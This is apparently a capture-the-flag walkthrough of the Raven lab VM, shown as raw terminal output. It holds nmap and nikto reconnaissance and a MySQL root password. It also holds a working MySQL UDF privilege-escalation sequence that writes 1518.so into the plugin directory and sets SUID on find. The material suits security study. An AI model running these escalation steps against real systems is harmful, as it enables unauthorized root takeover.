root@kali:~# nmap -sn -v 192.168.56.* Nmap scan report for 192.168.56.119 Host is up (0.00022s latency). MAC Address: 08:00:27:A4:D6:91 (Oracle VirtualBox virtual NIC)
1 2 3 4 5 6
root@kali:~# nmap -sV -v -p- 192.168.56.119 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 58132/tcp open status 1 (RPC #100024)
root@kali:~# nmap -A -v -p 22,80,111,58132 192.168.56.119 --script=vuln -T4 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) |_clamav-exec: ERROR: Script execution failed (use -d to debug) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_clamav-exec: ERROR: Script execution failed (use -d to debug) | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.119 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.56.119:80/ | Form id: | Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01 | | Path: http://192.168.56.119:80/service.html | Form id: | Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01 | | Path: http://192.168.56.119:80/contact.php | Form id: myform | Form action: | | Path: http://192.168.56.119:80/contact.php | Form id: | Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01 | | Path: http://192.168.56.119:80/index.html | Form id: | Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01 | | Path: http://192.168.56.119:80/wordpress/ | Form id: search-form-5e7c8d72d17d7 |_ Form action: http://raven.local/wordpress/ |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /wordpress/: Blog | /wordpress/wp-login.php: Wordpress login page. | /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' | /img/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' | /js/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' | /manual/: Potentially interesting folder |_ /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' |_http-server-header: Apache/2.4.10 (Debian) |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 111/tcp open rpcbind 2-4 (RPC #100000) |_clamav-exec: ERROR: Script execution failed (use -d to debug) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 35360/udp6 status | 100024 1 35599/tcp6 status | 100024 1 46931/udp status |_ 100024 1 58132/tcp status 58132/tcp open status 1 (RPC #100024) |_clamav-exec: ERROR: Script execution failed (use -d to debug)
上nikto
1 2 3 4 5 6 7 8 9
root@kali:~# nikto -C all -h 192.168.56.119 + OSVDB-3268: /img/: Directory indexing found. + OSVDB-3092: /img/: This might be interesting... + OSVDB-3092: /manual/: Web server manual found. + OSVDB-3268: /manual/images/: Directory indexing found. + OSVDB-6694: /.DS_Store: Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version. + OSVDB-3233: /icons/README: Apache default file found. + Uncommon header 'link' found, with contents: <http://raven.local/wordpress/index.php/wp-json/>; rel="https://api.w.org/" + /wordpress/: A Wordpress installation was found.
www-data@Raven:/var/www$ dpkg -l | grep mysql dpkg -l | grep mysql ii libdbd-mysql-perl 4.028-2+deb8u2 amd64 Perl5 database interface to the MySQL database ii libmysqlclient18:amd64 5.5.60-0+deb8u1 amd64 MySQL database client library ii mysql-client-5.5 5.5.60-0+deb8u1 amd64 MySQL database client binaries ii mysql-common 5.5.60-0+deb8u1 all MySQL database common files, e.g. /etc/mysql/my.cnf ii mysql-server 5.5.60-0+deb8u1 all MySQL database server (metapackage depending on the latest version) ii mysql-server-5.5 5.5.60-0+deb8u1 amd64 MySQL database server binaries and system database setup ii mysql-server-core-5.5 5.5.60-0+deb8u1 amd64 MySQL database server binaries ii php5-mysqlnd 5.6.36+dfsg-0+deb8u1 amd64 MySQL module for php5 (Native Driver) ii php5-mysqlnd-ms 1.6.0-1+b1 amd64 MySQL replication and load balancing module for PHP
www-data@Raven:/tmp$ mysql -uroot -p'R@v3nSecurity' mysql -uroot -p'R@v3nSecurity' Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 37 Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.
mysql> use mysql; use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed mysql> create table foo(line blob); insert into foo values(load_file('/tmp/1518.so')); select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so'; create function do_system returns integer soname '1518.so'; select do_system('chmod u+s /usr/bin/find');create table foo(line blob); insert into foo values(load_file('/tmp/1518.so')); select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so'; create function do_system returns integer soname '1518.so'; Query OK, 0 rows affected (0.00 sec)